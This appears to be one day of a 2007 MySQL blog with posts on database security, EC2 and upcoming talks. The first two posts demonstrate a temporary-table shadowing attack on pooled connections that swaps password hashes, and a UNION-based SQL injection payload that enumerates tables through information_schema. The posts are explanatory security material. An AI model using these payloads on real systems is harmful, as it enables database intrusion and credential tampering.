Saturday, December 15th, 2007

Time	Event
3:11p	Proof of concept attack when using connection pooling. mysql> create database attack; Query OK, 1 row affected (0.00 sec) mysql> use attack; Database changed mysql> create table users (id INT UNSIGNED NOT NULL PRIMARY KEY auto_increment, username varchar(30) NOT NULL, password char(32) NOT NULL, UNIQUE KEY (username)); Query OK, 0 rows affected (0.00 sec) mysql> INSERT into users (username, password) VALUES ('morgo', MD5('my_password')), ('ted', MD5('another_password')); Query OK, 2 rows affected (0.41 sec) Records: 2 Duplicates: 0 Warnings: 0 mysql> SELECT * FROM users; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | morgo | a865a7e0ddbf35fa6f6a232e0893bea4 | | 2 | ted | 280fb9194368f9d1d44f8ddcc13f2717 | +----+----------+----------------------------------+ 2 rows in set (0.00 sec) mysql> CREATE TEMPORARY TABLE users_copy LIKE users; Query OK, 0 rows affected (0.04 sec) mysql> INSERT into users_copy SELECT id, username, md5('anything') FROM users; Query OK, 2 rows affected (0.00 sec) Records: 2 Duplicates: 0 Warnings: 0 mysql> CREATE TEMPORARY TABLE users LIKE users_copy; Query OK, 0 rows affected (0.01 sec) mysql> INSERT INTO users SELECT * FROM users_copy; Query OK, 2 rows affected (0.00 sec) Records: 2 Duplicates: 0 Warnings: 0 mysql> SELECT * FROM users; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | morgo | f0e166dc34d14d6c228ffac576c9a43c | | 2 | ted | f0e166dc34d14d6c228ffac576c9a43c | +----+----------+----------------------------------+ 2 rows in set (0.00 sec) Notice the subtle attack? It's a documented feature that you can have a temporary table by the same name as a base table, and the temporary table takes precedence. Normally this isn't a problem, because a temporary table is only available in the current session, but if you are using connection pooling the next person to get your connection may not get what they expected. (1 Comment | Comment on this)
3:22p	I [heart] information_schema With MySQL 5.0, it's much easier to do SQL Injection attacks, because you can use UNION against information schema. You couldn't do this with the old SHOW commands. i.e. SELECT * FROM users WHERE id = $id; becomes: SELECT * FROM users WHERE id = 0 UNION SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() group by table_schema; The rules to a union in MySQL is that the second query must match the same number of columns as the first query. In this case, you can just keep changing it till you get the column count right: SELECT group_concat(table_name), 1, 2, 3, 4 FROM information_schema.tables WHERE table_schema=DATABASE() group by table_schema; I presented on these types of attacks here (Comment on this)
3:35p	Conferences for Next Year I figure while I'm in the blogging spirit, I should announce where you can catch me presenting early next year: March 12-14 - PHP Quebec * Security from the Database Perspective * Breaking the Rules April 14-17th - MySQL Conference * Exploring Amazon EC2 for Scale Out Applications May 21st-23rd php|tek * Performance Tuning MySQL * Designing for High Availability I decided to do something different and submit about 10 outlines for possible talks, so it's interesting to see what each of the organizers eventually arrive at. (Comment on this)
3:47p	A strange use for MySQL Proxy I've been talking to some Montrealers about using Amazon EC2. One of the small issues with EC2 is that you have no fixed IP addresses for your instances. This means that people are having to use DNS, which works well 99% of the time[1]. One of the problems for me, is that I can't as easily have a virtual interface, which is the IP address of the current master database server - I have to have a hostname like mysql-master.mydomain.com. Which means that if I switch masters, I have to wait for the TTL length for old clients to stop connecting to the previous master (In talking to Rightscale, they set it to 45 seconds, PeterZ has blogged about with not to use 0 second TTLs here). The possible solution - when you switch masters, the previous master shuts down mysqld and loads up the proxy to forward to the new master. [1] See: http://dev.mysql.com/doc/refman/5.0/en/dns.html. Also just google search for skip-name-resolve to see the issues people have with flakey DNS servers. (3 Comments | Comment on this)
7:03p	Should you run DRBD with EC2? I had some free time this weekend, so I thought I would give DRBD a look on EC2... It wasn't long in, and I made a discovery: etch:~# ifconfig eth0 Link encap:Ethernet HWaddr 12:31:38:00:35:37 inet addr:10.252.58.197 Bcast:10.252.59.255 Mask:255.255.254.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:82547 errors:0 dropped:0 overruns:0 frame:0 TX packets:41818 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:121402208 (115.7 MiB) TX bytes:2645395 (2.5 MiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) At least from the perspective of my instance, there's only one network interface. Maybe the host has more than one with bonding, but unless I can prove that for certain, it's just an accident (split brain) waiting to happen. Read Florian's notes on this here. (Comment on this)

<< Previous Day

2007/12/15 [Calendar]

Next Day >>